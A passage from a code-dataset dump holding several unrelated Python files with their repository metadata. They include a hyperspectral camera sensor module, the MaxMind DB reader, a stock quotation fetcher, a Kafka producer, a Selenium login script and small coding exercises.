raster.GetRasterBand(7).ReadAsArray()\n band3 = raster.GetRasterBand(1).ReadAsArray()\n arr1 = band1.astype(np.float32)\n maxim = np.nanmax(band1)\n band1_255 = np.uint8(arr1 / maxim * 255)\n arr1 = band2.astype(np.float32)\n maxim = np.nanmax(arr1)\n band2_255 = np.uint8(arr1 / maxim * 255)\n arr1 = band3.astype(np.float32)\n maxim = np.nanmax(arr1)\n band3_255 = np.uint8(arr1 / maxim * 255)\n\n # find and extract file-relevant info from taskfile\n rawfilename = os.path.split(file)[1].replace('_CORRECTED.dat', '.DAT')[6:]\n filenumber = np.where(taskfile[:, 0] == rawfilename)\n test = taskfile[filenumber, 16].tolist()\n altitude = float('[]'.join(test[0]))\n longi = taskfile[filenumber, 11].tolist()\n long = float('[]'.join(longi[0])) / 100\n lati = taskfile[filenumber, 9].tolist()\n lat = float('[]'.join(lati[0])) / 100\n WEi = taskfile[filenumber, 12].tolist()\n WE = ('[]'.join(WEi[0]))\n NSi = taskfile[filenumber, 10].tolist()\n NS = ('[]'.join(NSi[0]))\n time = taskfile[1, 6]\n date = str(\"%02d\" % (int((time.split(' ')[1]).split('.')[2]),) + ':' + \"%02d\" % (\n int((time.split(' ')[1]).split('.')[1]),) + ':' + \"%02d\" % (int((time.split(' ')[1]).split('.')[0]),))\n out = MAIN + 'RGB/' + os.path.split(file)[-1][:-4] + '.jpg'\n\n # save jpg with exif using piexif\n exif_dict = {'0th': {},\n '1st': {},\n 'Exif': {},\n 'GPS': {\n 1: NS, # latituderef\n 2: ((int(lat), 1), (int(100 * (lat - int(lat))), 1),\n (int((100 * (lat - int(lat)) - int(100 * (lat - int(lat)))) * 6000), 100)), # Latitude\n 3: WE, # Longituteref\n 4: ((int(long), 1), (int(100 * (long - int(long))), 1),\n (int((100 * (long - int(long)) - int(100 * (long - int(long)))) * 6000), 100)),\n # longitude\n 6: (abs(int(altitude * 100)), 100), # Altitude\n 7: (\n (int((time.split(' ')[2]).split(':')[0]), 1), (int((time.split(' ')[2]).split(':')[1]), 1),\n (int((float((time.split(' ')[2]).split(':')[2])) * 100), 10)),\n 29: date}, # timestamp\n 'Interop': {},\n 'thumbnail': None}\n exif_bytes = piexif.dump(exif_dict)\n plt.imsave(out,np.dstack((band1_255, band2_255, band3_255)))\n piexif.insert(exif_bytes, out)\n\n \"\"\"\n # save image and write EXIF information with exiftools instead\n lat=(int(lat))+(int(100*(lat-int(lat))))/60.+(100*(lat-int(lat))-int(100*(lat-int(lat))))*6000/360000.0\n long=(int(long))+(int(100*(long-int(long))))/60.+(100*(long-int(long))-int(100*(long-int(long))))*6000/360000.0\n im.save(out)\n pic = out.encode(\"utf-8\")\n with exiftool.ExifTool() as et:\n et.execute((\"-GPSLatitudeRef=\" + NS).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n et.execute((\"-GPSLongitudeRef=\" + WE).encode(\"utf-8\"),b\"-overwrite_original\", pic)\n et.execute((\"-GPSLatitude=\" + str(lat)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n et.execute((\"-GPSLongitude=\" + str(long)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n et.execute((\"-GPSAltitude=\" + str(altitude)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n et.execute((\"-GPSTimeStamp=\" + str(time)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n et.execute((\"-GPSDateStamp=\" + str(date)).encode(\"utf-8\"), b\"-overwrite_original\", pic)\n \"\"\"\n\nclass Rikola_RSC1( Rikola ): # old Rikola\n\n \"\"\"\n Sensor specific details for the Rikola camera\n \"\"\"\n @classmethod\n def name(cls):\n \"\"\"\n Returns this sensors name\n \"\"\"\n return \"Rikola RSC-1\"\n\n @classmethod\n def fov(cls):\n \"\"\"\n Return the (vertical) sensor field of view .\n \"\"\"\n return 36.5\n\n @classmethod\n def ypixels(cls):\n \"\"\"\n Return the number of pixels in the y-dimension.\n \"\"\"\n return 1010\n\n @classmethod\n def xpixels(cls):\n \"\"\"\n Return the number of pixels in the x-dimension (==1 for line scanners).\n \"\"\"\n return 1010\n\n @classmethod\n def pitch(cls):\n \"\"\"\n Return the pitch (mm) of the each pixel in the y-dimension (though most pixels are square).\n \"\"\"\n return 0.0055\n\nclass Rikola_HSC2( Rikola ): # new Rikola\n\n \"\"\"\n Sensor specific details for the Rikola camera\n \"\"\"\n\n @classmethod\n def name(cls):\n \"\"\"\n Returns this sensors name\n \"\"\"\n return \"Rikola HSC-2\"\n\n @classmethod\n def fov(cls):\n \"\"\"\n Return the (vertical) sensor field of view .\n \"\"\"\n return 36.8\n\n @classmethod\n def ypixels(cls):\n \"\"\"\n Return the number of pixels in the y-dimension.\n \"\"\"\n return 1024\n\n @classmethod\n def xpixels(cls):\n \"\"\"\n Return the number of pixels in the x-dimension (==1 for line scanners).\n \"\"\"\n return 1024\n\n @classmethod\n def pitch(cls):\n \"\"\"\n Return the pitch of the each pixel in the y-dimension (though most pixels are square).\n \"\"\"\n return 0.0055","repo_name":"hifexplo/hylite","sub_path":"hylite/sensors/rikola.py","file_name":"rikola.py","file_ext":"py","file_size_in_byte":27350,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"6"} +{"seq_id":"71950508987","text":"import easyquotation\nfrom six import iteritems\nfrom dateutil.parser import parse\nimport numpy as np\n\nfrom .utills import order_book_id_2_code, code_2_order_book_id\n\n\ndef get_quotation(order_book_ids, data_cache, resource='sina'):\n tick_dict = {}\n\n quotation = easyquotation.use(resource)\n\n code_list = [order_book_id_2_code(order_book_id) for order_book_id in order_book_ids]\n\n eq_dict = quotation.stocks(code_list)\n\n for code, data in iteritems(eq_dict):\n tick = {\n 'order_book_id': code_2_order_book_id(code),\n 'datetime': parse('%s %s' % (data['date'], data['time'])),\n 'open': data['open'],\n 'last': data['now'],\n 'low': data['low'],\n 'high': data['high'],\n 'prev_close': data['close'],\n 'volume': data['volume'],\n 'total_turnover': data['turnover'],\n 'open_interest': np.nan,\n 'prev_settlement': np.nan,\n\n 'bid': [\n data['bid1'],\n data['bid2'],\n data['bid3'],\n data['bid4'],\n data['bid5'],\n ],\n 'bid_volume': [\n data['bid1_volume'],\n data['bid2_volume'],\n data['bid3_volume'],\n data['bid4_volume'],\n data['bid5_volume'],\n ],\n 'ask': [\n data['ask1'],\n data['ask2'],\n data['ask3'],\n data['ask4'],\n data['ask5'],\n ],\n 'ask_volume': [\n data['ask1_volume'],\n data['ask2_volume'],\n data['ask3_volume'],\n data['ask4_volume'],\n data['ask5_volume'],\n ],\n\n 'limit_up': np.nan,\n 'limit_down': np.nan,\n }\n tick_dict[code_2_order_book_id(code)] = tick\n data_cache.put(tick_dict, 'easy_quotation')\n","repo_name":"Cuizi7/quotation","sub_path":"quotation/eq.py","file_name":"eq.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"6"} +{"seq_id":"10776816712","text":"\"\"\"\nmaxminddb.reader\n~~~~~~~~~~~~~~~~\n\nThis module contains the pure Python database reader and related classes.\n\n\"\"\"\ntry:\n import mmap\nexcept ImportError:\n # pylint: disable=invalid-name\n mmap = None # type: ignore\n\nimport ipaddress\nimport struct\nfrom ipaddress import IPv4Address, IPv6Address\nfrom os import PathLike\nfrom typing import Any, AnyStr, IO, Optional, Tuple, Union\n\nfrom maxminddb.const import MODE_AUTO, MODE_MMAP, MODE_FILE, MODE_MEMORY, MODE_FD\nfrom maxminddb.decoder import Decoder\nfrom maxminddb.errors import InvalidDatabaseError\nfrom maxminddb.file import FileBuffer\nfrom maxminddb.types import Record\n\n_IPV4_MAX_NUM = 2**32\n\n\nclass Reader:\n \"\"\"\n Instances of this class provide a reader for the MaxMind DB format. IP\n addresses can be looked up using the ``get`` method.\n \"\"\"\n\n _DATA_SECTION_SEPARATOR_SIZE = 16\n _METADATA_START_MARKER = b\"\\xAB\\xCD\\xEFMaxMind.com\"\n\n _buffer: Union[bytes, FileBuffer, \"mmap.mmap\"]\n _buffer_size: int\n closed: bool\n _decoder: Decoder\n _metadata: \"Metadata\"\n _ipv4_start: int\n\n def __init__(\n self, database: Union[AnyStr, int, PathLike, IO], mode: int = MODE_AUTO\n ) -> None:\n \"\"\"Reader for the MaxMind DB file format\n\n Arguments:\n database -- A path to a valid MaxMind DB file such as a GeoIP2 database\n file, or a file descriptor in the case of MODE_FD.\n mode -- mode to open the database with. Valid mode are:\n * MODE_MMAP - read from memory map.\n * MODE_FILE - read database as standard file.\n * MODE_MEMORY - load database into memory.\n * MODE_AUTO - tries MODE_MMAP and then MODE_FILE. Default.\n * MODE_FD - the param passed via database is a file descriptor, not\n a path. This mode implies MODE_MEMORY.\n \"\"\"\n filename: Any\n if (mode == MODE_AUTO and mmap) or mode == MODE_MMAP:\n with open(database, \"rb\") as db_file: # type: ignore\n self._buffer = mmap.mmap(db_file.fileno(), 0, access=mmap.ACCESS_READ)\n self._buffer_size = self._buffer.size()\n filename = database\n elif mode in (MODE_AUTO, MODE_FILE):\n self._buffer = FileBuffer(database) # type: ignore\n self._buffer_size = self._buffer.size()\n filename = database\n elif mode == MODE_MEMORY:\n with open(database, \"rb\") as db_file: # type: ignore\n buf = db_file.read()\n self._buffer = buf\n self._buffer_size = len(buf)\n filename = database\n elif mode == MODE_FD:\n self._buffer = database.read() # type: ignore\n self._buffer_size = len(self._buffer) # type: ignore\n filename = database.name # type: ignore\n else:\n raise ValueError(\n f\"Unsupported open mode ({mode}). Only MODE_AUTO, MODE_FILE, \"\n \"MODE_MEMORY and MODE_FD are supported by the pure Python \"\n \"Reader\"\n )\n\n metadata_start = self._buffer.rfind(\n self._METADATA_START_MARKER, max(0, self._buffer_size - 128 * 1024)\n )\n\n if metadata_start == -1:\n self.close()\n raise InvalidDatabaseError(\n f\"Error opening database file ({filename}). \"\n \"Is this a valid MaxMind DB file?\"\n )\n\n metadata_start += len(self._METADATA_START_MARKER)\n metadata_decoder = Decoder(self._buffer, metadata_start)\n (metadata, _) = metadata_decoder.decode(metadata_start)\n\n if not isinstance(metadata, dict):\n raise InvalidDatabaseError(\n f\"Error reading metadata in database file ({filename}).\"\n )\n\n self._metadata = Metadata(**metadata) # pylint: disable=bad-option-value\n\n self._decoder = Decoder(\n self._buffer,\n self._metadata.search_tree_size + self._DATA_SECTION_SEPARATOR_SIZE,\n )\n self.closed = False\n\n ipv4_start = 0\n if self._metadata.ip_version == 6:\n # We store the IPv4 starting node as an optimization for IPv4 lookups\n # in IPv6 trees. This allows us to skip over the first 96 nodes in\n # this case.\n node = 0\n for _ in range(96):\n if node >= self._metadata.node_count:\n break\n node = self._read_node(node, 0)\n ipv4_start = node\n self._ipv4_start = ipv4_start\n\n def metadata(self) -> \"Metadata\":\n \"\"\"Return the metadata associated with the MaxMind DB file\"\"\"\n return self._metadata\n\n def get(self, ip_address: Union[str, IPv6Address, IPv4Address]) -> Optional[Record]:\n \"\"\"Return the record for the ip_address in the MaxMind DB\n\n\n Arguments:\n ip_address -- an IP address in the standard string notation\n \"\"\"\n (record, _) = self.get_with_prefix_len(ip_address)\n return record\n\n def get_with_prefix_len(\n self, ip_address: Union[str, IPv6Address, IPv4Address]\n ) -> Tuple[Optional[Record], int]:\n \"\"\"Return a tuple with the record and the associated prefix length\n\n\n Arguments:\n ip_address -- an IP address in the standard string notation\n \"\"\"\n if isinstance(ip_address, str):\n address = ipaddress.ip_address(ip_address)\n else:\n address = ip_address\n\n try:\n packed_address = bytearray(address.packed)\n except AttributeError as ex:\n raise TypeError(\"argument 1 must be a string or ipaddress object\") from ex\n\n if address.version == 6 and self._metadata.ip_version == 4:\n raise ValueError(\n f\"Error looking up {ip_address}. You attempted to look up \"\n \"an IPv6 address in an IPv4-only database.\"\n )\n\n (pointer, prefix_len) = self._find_address_in_tree(packed_address)\n\n if pointer:\n return self._resolve_data_pointer(pointer), prefix_len\n return None, prefix_len\n\n def __iter__(self):\n return self._generate_children(0, 0, 0)\n\n def _generate_children(self, node, depth, ip_acc):\n if ip_acc != 0 and node == self._ipv4_start:\n # Skip nodes aliased to IPv4\n return\n\n node_count = self._metadata.node_count\n if node > node_count:\n bits = 128 if self._metadata.ip_version == 6 else 32\n ip_acc <<= bits - depth\n if ip_acc <= _IPV4_MAX_NUM and bits == 128:\n depth -= 96\n yield ipaddress.ip_network((ip_acc, depth)), self._resolve_data_pointer(\n node\n )\n elif node < node_count:\n left = self._read_node(node, 0)\n ip_acc <<= 1\n depth += 1\n yield from self._generate_children(left, depth, ip_acc)\n right = self._read_node(node, 1)\n yield from self._generate_children(right, depth, ip_acc | 1)\n\n def _find_address_in_tree(self, packed: bytearray) -> Tuple[int, int]:\n bit_count = len(packed) * 8\n node = self._start_node(bit_count)\n node_count = self._metadata.node_count\n\n i = 0\n while i < bit_count and node < node_count:\n bit = 1 & (packed[i >> 3] >> 7 - (i % 8))\n node = self._read_node(node, bit)\n i = i + 1\n\n if node == node_count:\n # Record is empty\n return 0, i\n if node > node_count:\n return node, i\n\n raise InvalidDatabaseError(\"Invalid node in search tree\")\n\n def _start_node(self, length: int) -> int:\n if self._metadata.ip_version == 6 and length == 32:\n return self._ipv4_start\n return 0\n\n def _read_node(self, node_number: int, index: int) -> int:\n base_offset = node_number * self._metadata.node_byte_size\n\n record_size = self._metadata.record_size\n if record_size == 24:\n offset = base_offset + index * 3\n node_bytes = b\"\\x00\" + self._buffer[offset : offset + 3]\n elif record_size == 28:\n offset = base_offset + 3 * index\n node_bytes = bytearray(self._buffer[offset : offset + 4])\n if index:\n node_bytes[0] = 0x0F & node_bytes[0]\n else:\n middle = (0xF0 & node_bytes.pop()) >> 4\n node_bytes.insert(0, middle)\n elif record_size == 32:\n offset = base_offset + index * 4\n node_bytes = self._buffer[offset : offset + 4]\n else:\n raise InvalidDatabaseError(f\"Unknown record size: {record_size}\")\n return struct.unpack(b\"!I\", node_bytes)[0]\n\n def _resolve_data_pointer(self, pointer: int) -> Record:\n resolved = pointer - self._metadata.node_count + self._metadata.search_tree_size\n\n if resolved >= self._buffer_size:\n raise InvalidDatabaseError(\"The MaxMind DB file's search tree is corrupt\")\n\n (data, _) = self._decoder.decode(resolved)\n return data\n\n def close(self) -> None:\n \"\"\"Closes the MaxMind DB file and returns the resources to the system\"\"\"\n try:\n self._buffer.close() # type: ignore\n except AttributeError:\n pass\n self.closed = True\n\n def __exit__(self, *args) -> None:\n self.close()\n\n def __enter__(self) -> \"Reader\":\n if self.closed:\n raise ValueError(\"Attempt to reopen a closed MaxMind DB\")\n return self\n\n\nclass Metadata:\n \"\"\"Metadata for the MaxMind DB reader\n\n\n .. attribute:: binary_format_major_version\n\n The major version number of the binary format used when creating the\n database.\n\n :type: int\n\n .. attribute:: binary_format_minor_version\n\n The minor version number of the binary format used when creating the\n database.\n\n :type: int\n\n .. attribute:: build_epoch\n\n The Unix epoch for the build time of the database.\n\n :type: int\n\n .. attribute:: database_type\n\n A string identifying the database type, e.g., \"GeoIP2-City\".\n\n :type: str\n\n .. attribute:: description\n\n A map from locales to text descriptions of the database.\n\n :type: dict(str, str)\n\n .. attribute:: ip_version\n\n The IP version of the data in a database. A value of \"4\" means the\n database only supports IPv4. A database with a value of \"6\" may support\n both IPv4 and IPv6 lookups.\n\n :type: int\n\n .. attribute:: languages\n\n A list of locale codes supported by the databse.\n\n :type: list(str)\n\n .. attribute:: node_count\n\n The number of nodes in the database.\n\n :type: int\n\n .. attribute:: record_size\n\n The bit size of a record in the search tree.\n\n :type: int\n\n \"\"\"\n\n # pylint: disable=too-many-instance-attributes\n def __init__(self, **kwargs) -> None:\n \"\"\"Creates new Metadata object. kwargs are key/value pairs from spec\"\"\"\n # Although I could just update __dict__, that is less obvious and it\n # doesn't work well with static analysis tools and some IDEs\n self.node_count = kwargs[\"node_count\"]\n self.record_size = kwargs[\"record_size\"]\n self.ip_version = kwargs[\"ip_version\"]\n self.database_type = kwargs[\"database_type\"]\n self.languages = kwargs[\"languages\"]\n self.binary_format_major_version = kwargs[\"binary_format_major_version\"]\n self.binary_format_minor_version = kwargs[\"binary_format_minor_version\"]\n self.build_epoch = kwargs[\"build_epoch\"]\n self.description = kwargs[\"description\"]\n\n @property\n def node_byte_size(self) -> int:\n \"\"\"The size of a node in bytes\n\n :type: int\n \"\"\"\n return self.record_size // 4\n\n @property\n def search_tree_size(self) -> int:\n \"\"\"The size of the search tree\n\n :type: int\n \"\"\"\n return self.node_count * self.node_byte_size\n\n def __repr__(self):\n args = \", \".join(f\"{k}={v!r}\" for k, v in self.__dict__.items())\n return f\"{self.__module__}.{self.__class__.__name__}({args})\"\n","repo_name":"maxmind/MaxMind-DB-Reader-python","sub_path":"maxminddb/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":12183,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"6"} +{"seq_id":"24333876062","text":"def sent_rev(s):\n l=[]\n x=s.split(' ')\n l=x[::-1]\n if l[0]=='':\n l.remove('')\n elif l[-1]=='':\n l.remove('')\n s=str(' '.join(l))\n return s\n \nprint(sent_rev(' Hi John, are you ready to go? '))\n\n\n'''\n\ngo? to ready you are John, Hi \n\n\n'''\n","repo_name":"nami-h/Python","sub_path":"sentence reversal and remove leading and trailing space.py","file_name":"sentence reversal and remove leading and trailing space.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73949723068","text":"n = 1000000\nx = 0\n\n#Задаємо проміжок числу х\nwhile n <= 1000000000:\n\n temp = n\n rev = 0\n\n #\"Перегортаємо\" числа\n while temp > 0:\n num = temp % 10\n rev = rev * 10 + num\n temp = temp // 10\n\n #Порівнюємо число х з його дзеркальним відображенням\n if rev == n:\n print(str(n), end = ' ')\n x += 1\n\n n += 1\n\n#Виводимо число паліндром на інтервалі\nprint(\"\\n\" + str(x) + \" palindromes\")\n","repo_name":"smrtfl/KPI","sub_path":"I-semester/OP-Labs/lab5/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70766865147","text":"from abc import ABCMeta\nfrom typing import (\n Tuple,\n Any,\n Dict\n)\nimport inspect\nfrom binascii import crc32\nimport re\n\n_SIGN_PAYLOAD = {}\n_NAME_PAYLOAD = {}\n\n\nclass PayloadMeta(ABCMeta):\n def __new__(mcs, mcs_name, mcs_bases, mcs_namespace):\n new_namespace = {\n '__constructor__': None,\n '__decorated__': None,\n }\n new_namespace.update(mcs_namespace)\n\n new_namespace.update({\n 'SIGN': property(fget=lambda *_: sign),\n })\n\n cls = super().__new__(\n mcs,\n mcs_name,\n mcs_bases,\n new_namespace,\n )\n try:\n sign = inspect.getsource(cls)\n constructor = cls\n except OSError:\n # 使用修饰器创建的payload类\n sign = inspect.getsource(cls.__decorated__)\n constructor = cls.__constructor__\n\n sign = f\"{crc32(sign.encode('utf-8')):x}\"\n _SIGN_PAYLOAD[sign] = constructor\n _NAME_PAYLOAD[cls.NAME] = constructor\n return cls\n\n\nclass BasePayload(object, metaclass=PayloadMeta):\n NAME: str = 'base'\n SIGN: str\n\n __args__: Tuple\n __kwargs__: Dict\n\n def __new__(cls, *args, **kwargs) -> Any:\n inst = object.__new__(cls)\n inst.__args__ = args\n inst.__kwargs__ = kwargs\n return inst\n\n\nclass IgnoreObjectPayload(\n BasePayload,\n # metaclass=PayloadMeta\n):\n NAME = 'object'\n\n def __init__(self, obj):\n self.repr = repr(obj)\n\n\nclass OtherPayload(\n BasePayload,\n # metaclass=PayloadMeta\n):\n NAME = 'other'\n\n def __init__(self, o):\n pass\n\n\ndef get_payload_by_sign(sign):\n return _SIGN_PAYLOAD.get(sign)\n\n\ndef get_payload_by_name(name):\n return _NAME_PAYLOAD.get(name)","repo_name":"ZSAIm/VideoCrawlerEngine","sub_path":"helper/payload/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":420,"dataset":"github-code","pt":"6"} +{"seq_id":"8338721754","text":"import pandas as pd\nfrom sklearn.preprocessing import LabelEncoder\nimport numpy as np\n\ndef readData():\n\n data = pd.read_csv('data/criteo_sample.txt')\n sparse_features = ['C' + str(i) for i in range(1, 27)] #类别型特征\n dense_features = ['I'+str(i) for i in range(1, 14)] #连续型特征\n\n data[sparse_features] = data[sparse_features].fillna('-1')\n data[dense_features] = data[dense_features].fillna(0)\n\n #将类别型特征硬编码\n for feat in sparse_features:\n lbe = LabelEncoder()\n data[feat] = lbe.fit_transform(data[feat])\n\n labels = data['label']\n X = data[sparse_features+dense_features]\n\n #X=data[sparse_features]\n return np.array(X),np.array(labels)\n\n\nif __name__ == '__main__':\n print(readData())\n","repo_name":"rexrex9/DeepFM_tf2","sub_path":"readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"40966853532","text":"#\n# @lc app=leetcode id=74 lang=python3\n#\n# [74] Search a 2D Matrix\n#\n\n# @lc code=start\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n for row in range(len(matrix)):\n if self.binary_search(matrix[row], target, 0, len(matrix[row])-1):\n return True\n else:\n return False\n \n def binary_search(self, list, target, start, end):\n if start > end:\n return False\n mid = start + (end - start) // 2\n if target == list[mid]: return True\n elif target > list[mid]: return self.binary_search(list, target, mid + 1, end)\n else: return self.binary_search(list, target, start, mid - 1)\n\n\n# Notes (6/13/2023)\n# Run a binary search on each of the row to check if a number exists \n\n# time complexity - O(m * log n)\n\n# Improved solution:\n# Run a binary search to figure out which row could contain a target, and \n# run a binary search again to see if a target exists in that row\n\n# time complexity - O(log m * log n)\n \n# @lc code=end\n\n","repo_name":"saki-imai-1204/leetcode","sub_path":"code/74.search-a-2-d-matrix.py","file_name":"74.search-a-2-d-matrix.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"14472085783","text":"'''\nGiven three integers x, y, and bound, return a list of all the powerful integers that have a value less than or equal to bound.\n\nAn integer is powerful if it can be represented as xi + yj for some integers i >= 0 and j >= 0.\n\nYou may return the answer in any order. In your answer, each value should occur at most once.\n\n \n\nExample 1:\n\nInput: x = 2, y = 3, bound = 10\nOutput: [2,3,4,5,7,9,10]\nExplanation:\n2 = 20 + 30\n3 = 21 + 30\n4 = 20 + 31\n5 = 21 + 31\n7 = 22 + 31\n9 = 23 + 30\n10 = 20 + 32\nExample 2:\n\nInput: x = 3, y = 5, bound = 15\nOutput: [2,4,6,8,10,14]\n \n\nConstraints:\n\n1 <= x, y <= 100\n0 <= bound <= 106\n'''\n\nclass Solution:\n def powerfulIntegers(self, x: int, y: int, bound: int) -> List[int]:\n a = bound if x == 1 else int(log(bound, x))\n b = bound if y == 1 else int(log(bound, y))\n \n powerful_integers = set()\n \n for i in range(a+1):\n for j in range(b+1):\n value = x**i + y**j\n if value <= bound:\n powerful_integers.add(value)\n if y == 1:\n break\n \n if x == 1:\n break\n \n return list(powerful_integers)\n \n","repo_name":"loganyu/leetcode","sub_path":"problems/970_powerful_integers.py","file_name":"970_powerful_integers.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"16402806494","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\nimport ssl\nimport socket\nfrom kafka import KafkaProducer\nfrom kafka.errors import KafkaError\nfrom thinkutils.config.Config import *\nfrom thinkutils.log.log import g_logger\nimport os\n\nclass ThinkKafkaProducer(object):\n\n g_kafkaContext = None\n g_producer = None\n\n @classmethod\n def init(cls):\n cls.g_producer = KafkaProducer(bootstrap_servers=g_config.get(\"kafka_mq\", \"bootstrap_servers\"))\n\n @classmethod\n def send(cls, szTopic, szKey, szMsg):\n g_logger.debug(\"FXXK\")\n try:\n g_logger.debug(\"%s\" % (szMsg, ))\n partitions = cls.g_producer.partitions_for(szTopic)\n g_logger.debug('Topic下分区: %s' % (partitions, ))\n future = cls.g_producer.send(szTopic, szMsg, key=szKey)\n future.get()\n # g_logger.debug('send message success.')\n except KafkaError as e:\n g_logger.error('send message failed. %s' % e.message)\n","repo_name":"ThinkmanWang/P3Demo","sub_path":"thinkutils/kafkamq/ThinkKafkaProducer.py","file_name":"ThinkKafkaProducer.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26048180671","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\nimport os\nimport random\n\nurl = 'https://evermos.com/home/' \ntab_url = 'https://www.google.com' \ndirpath = os.getcwd()\nchrome_dir = \"{}/chromedriver\".format(dirpath)\ndriver = webdriver.Chrome(executable_path =chrome_dir)\ndriver.maximize_window()\ndriver.get(url)\ntime.sleep(5)\nnotss = driver.find_elements_by_class_name(\"masuk\")\nnotss[0].click()\ntime.sleep(5)\ntelp = driver.find_elements_by_class_name(\"inputText__input\")\ntelp[0].send_keys('621223334444')\ntelp[1].send_keys('password')\nlogin = driver.find_elements_by_class_name(\"btn--large\")\nlogin[0].click()\ntime.sleep(5)\nhome = driver.find_elements_by_class_name(\"appNav__item\")\nhome[2].click()\ntime.sleep(5)\nsalin = driver.find_elements_by_class_name(\"storeFront__option\")\nsalin[2].click()\ntime.sleep(5)\ndriver.execute_script(\"alert('Terimakasih. Semoga berkenan')\")\ntime.sleep(5)\nalert = driver.switch_to.alert\nalert.accept()\nprint('Good bye')\ndriver.close()\n","repo_name":"nisaichul/evermos","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"32968286069","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Schlichtkrull Sampler Class.\"\"\"\n\nimport logging\nfrom typing import Optional, Tuple\n\nimport torch\nfrom torch.utils.data.sampler import Sampler\n\nfrom ..triples import TriplesFactory\n\n\ndef _compute_compressed_adjacency_list(\n triples_factory: TriplesFactory,\n) -> Tuple[torch.LongTensor, torch.LongTensor, torch.LongTensor]:\n \"\"\"Compute compressed undirected adjacency list representation for efficient sampling.\n\n The compressed adjacency list format is inspired by CSR sparse matrix format.\n\n :param triples_factory: The triples factory.\n :return: a tuple (degrees, offsets, compressed_adj_lists)\n where\n degrees: shape: (num_entities,)\n offsets: shape: (num_entities,)\n compressed_adj_list: shape: (2*num_triples, 2)\n with\n adj_list[i] = compressed_adj_list[offsets[i]:offsets[i+1]]\n \"\"\"\n adj_lists = [[] for _ in range(triples_factory.num_entities)]\n for i, (s, _, o) in enumerate(triples_factory.mapped_triples):\n adj_lists[s].append([i, o.item()])\n adj_lists[o].append([i, s.item()])\n degrees = torch.tensor([len(a) for a in adj_lists], dtype=torch.long)\n assert torch.sum(degrees) == 2 * triples_factory.num_triples\n\n offset = torch.empty(triples_factory.num_entities, dtype=torch.long)\n offset[0] = 0\n offset[1:] = torch.cumsum(degrees, dim=0)[:-1]\n compressed_adj_lists = torch.cat([torch.as_tensor(adj_list, dtype=torch.long) for adj_list in adj_lists], dim=0)\n return degrees, offset, compressed_adj_lists\n\n\nclass GraphSampler(Sampler):\n r\"\"\"Samples edges based on the proposed method in Schlichtkrull et al.\n\n .. seealso::\n\n https://github.com/MichSchli/RelationPrediction/blob/2560e4ea7ccae5cb4f877ac7cb1dc3924f553827/code/train.py#L161-L247\n \"\"\"\n\n def __init__(\n self,\n triples_factory: TriplesFactory,\n num_samples: Optional[int] = None,\n ):\n mapped_triples = triples_factory.mapped_triples\n super().__init__(data_source=mapped_triples)\n self.triples_factory = triples_factory\n\n if num_samples is None:\n num_samples = triples_factory.num_triples // 10\n logging.info(f'Did not specify number of samples. Using {num_samples}.')\n elif num_samples > triples_factory.num_triples:\n raise ValueError('num_samples cannot be larger than the number of triples, but '\n f'{num_samples} > {triples_factory.num_triples}.')\n if not isinstance(num_samples, int) or num_samples <= 0:\n raise ValueError(\"num_samples should be a positive integer \"\n \"value, but got num_samples={}\".format(num_samples))\n self.num_samples = num_samples\n self.num_batches_per_epoch = triples_factory.num_triples // self.num_samples\n\n # preprocessing\n self.degrees, self.offset, self.neighbors = _compute_compressed_adjacency_list(triples_factory=triples_factory)\n\n def __iter__(self): # noqa: D105\n # initialize\n chosen_edges = torch.empty(self.num_samples, dtype=torch.long)\n node_weights = self.degrees.detach().clone()\n edge_picked = torch.zeros(self.triples_factory.num_triples, dtype=torch.bool)\n node_picked = torch.zeros(self.triples_factory.num_entities, dtype=torch.bool)\n\n # sample iteratively\n for i in range(0, self.num_samples):\n # determine weights\n weights = node_weights * node_picked\n\n # only happens at first iteration\n if torch.sum(weights) == 0:\n weights = torch.ones_like(weights)\n weights[node_weights == 0] = 0\n assert i == 0\n else:\n assert i > 0\n\n # normalize to probabilities\n probabilities = weights.float() / weights.sum().float()\n\n # sample a start node\n chosen_vertex = torch.multinomial(probabilities, num_samples=1)[0]\n node_picked[chosen_vertex] = True\n\n # get list of neighbors\n start = self.offset[chosen_vertex]\n chosen_node_degree = self.degrees[chosen_vertex]\n stop = start + chosen_node_degree\n adj_list = self.neighbors[start:stop, :]\n\n # sample an outgoing edge at random which has not been chosen yet using rejection sampling\n chosen_edge_index = torch.randint(chosen_node_degree, size=(1,))[0]\n chosen_edge = 